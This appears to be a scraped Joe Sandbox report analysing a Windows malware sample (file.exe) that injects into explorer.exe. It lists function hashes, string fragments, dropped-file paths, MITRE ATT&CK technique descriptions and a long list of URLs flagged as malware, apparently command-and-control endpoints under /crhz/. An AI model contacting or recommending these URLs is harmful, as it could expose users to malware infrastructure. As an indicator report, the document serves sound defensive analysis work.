Opcode Fuzzy Hash: 5a3df0026cc56c1644cef290c070b6d3b80a5a80f5bc76ad6d38711de2aa5d2b
Instruction Fuzzy Hash: B1616C70A14B4C8FDB54EFA4C4646EEB7F1FF58300F404A2E989AE7254EF7099419B86

Uniqueness

Uniqueness Score: -1.00%

Function 0EF1C472 Relevance: 6.4, Strings: 5, Instructions: 104COMMON

Download Yara Rule

Strings

User, xrefs: 0EF1C4C0
on.d, xrefs: 0EF1C4B2
nt: , xrefs: 0EF1C4CE
urlm, xrefs: 0EF1C4AB
-Age, xrefs: 0EF1C4C7

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: -Age$User$nt: $on.d$urlm
API String ID: 0-1987325725
Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
Instruction ID: 6d55dec60aa898b89585693f7f8ecb14b12883f1a90daecd1bb0b3b67803665d
Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
Instruction Fuzzy Hash: 9231A131A14A5C8BDB04EFA8D8A46EDB7E1FF58204F40466FD44ED7250DF788A448B85

Uniqueness

Uniqueness Score: -1.00%

Function 0EF1A002 Relevance: 5.1, Strings: 4, Instructions: 145COMMON

Download Yara Rule

Strings

el32, xrefs: 0EF1A119
.dll, xrefs: 0EF1A121
kern, xrefs: 0EF1A111
h, xrefs: 0EF1A106

Memory Dump Source

Source File: 00000002.00000002.537030158.000000000EF10000.00000040.00000001.00040000.00000000.sdmp, Offset: 0EF10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ef10000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
Instruction ID: c378482dd41e5e0745f55e3b4f0c5be20ec2f1067bd03df994bcd9311c66754e
Opcode Fuzzy Hash: fe29a7bb7e7f92cd852e6a8374585ad37a329447348795b15412dffb0aea7bb3
Instruction Fuzzy Hash: 67416470A09B4C8FD769DF2884A43AAB7E1FB98305F144A7F949AC3255DF70C945CB41

Uniqueness

Uniqueness Score: -1.00%

Source: http://www.n-r-eng.com/crhz/	Avira URL Cloud: Label: malware
Source: http://www.n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyxkbVFYCGm9IFlQQ==&vux=DmStydFUWc8HD	Avira URL Cloud: Label: malware
Source: http://www.sandpiper-apts.com/crhz/?Mkn=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTGHGtv/xv4Is4Luw==&vux=DmStydFUWc8HD	Avira URL Cloud: Label: malware
Source: http://n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5	Avira URL Cloud: Label: malware
Source: http://www.sandpiper-apts.com/crhz/	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_02DF33D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_02DF4ADC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_02DF33C0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_02DF339C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_02DF470D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_02DF4125

Source: explorer.exe, 00000002.00000002.540010102.0000000015D92000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000004112000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://hvlandscapes.biz/crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR
Source: explorer.exe, 00000002.00000002.540010102.00000000155B8000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000003938000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://n-r-eng.com/crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5
Source: explorer.exe, 00000002.00000002.540010102.0000000015C00000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000003F80000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://suachuadienlanh247.com/crhz/?Mkn=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.frogair.online
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.frogair.online/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hayuterce.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hayuterce.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hvlandscapes.biz
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.hvlandscapes.biz/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.laylaroseuk.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.laylaroseuk.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mitsubangsaen.online
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mitsubangsaen.online/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n-r-eng.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n-r-eng.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nftspaceview.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nftspaceview.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nftspaceview.com~bm1
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nortonseecurity.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nortonseecurity.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popcors.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popcors.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.popcors.comCR
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sandpiper-apts.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sandpiper-apts.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.suachuadienlanh247.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.suachuadienlanh247.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teammart.online
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teammart.online/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teammart.onlineq
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tf8dangky.online
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tf8dangky.online/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepromotionhunter.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.thepromotionhunter.com/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wenzid4.top
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wenzid4.top/crhz/
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wenzid4.top/crhz/1B4DD6~
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wenzid4.topd
Source: explorer.exe, 00000002.00000002.537655705.000000000F54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.473174154.000000000F526000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wylvxing.com
Source: explorer.exe, 00000002.00000003.475367506.000000000F548000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wylvxing.com/crhz/
Source: 30q5648k6.10.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 30q5648k6.10.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 30q5648k6.10.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 30q5648k6.10.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000002.540010102.0000000015A6E000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000003DEE000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
Source: wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: wlanext.exe, 0000000A.00000003.352512729.00000000071C1000.00000004.00000020.00020000.00000000.sdmp, 30q5648k6.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000002.00000002.540010102.00000000158DC000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 0000000A.00000002.526928605.0000000003C5C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.tf8dangky.online/crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Temp\30q5648k6

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
file.exe

Function 02DF4910 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Function 02DF66DC Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 02DF66E8 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 02DF6D98 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 02DF6D93 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 02DF6B70 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Function 02DF6B78 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 02DF6C88 Relevance: 1.6, APIs: 1, Instructions: 98
memoryCOMMON

Function 02DF6C90 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Function 02DF4CD8 Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Function 02DF6A68 Relevance: 1.6, APIs: 1, Instructions: 88
threadinjectionCOMMON

Function 02DF6A63 Relevance: 1.6, APIs: 1, Instructions: 88
threadinjectionCOMMON

Function 02DF4CE0 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Function 02DF4909 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Function 02DF33CC Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre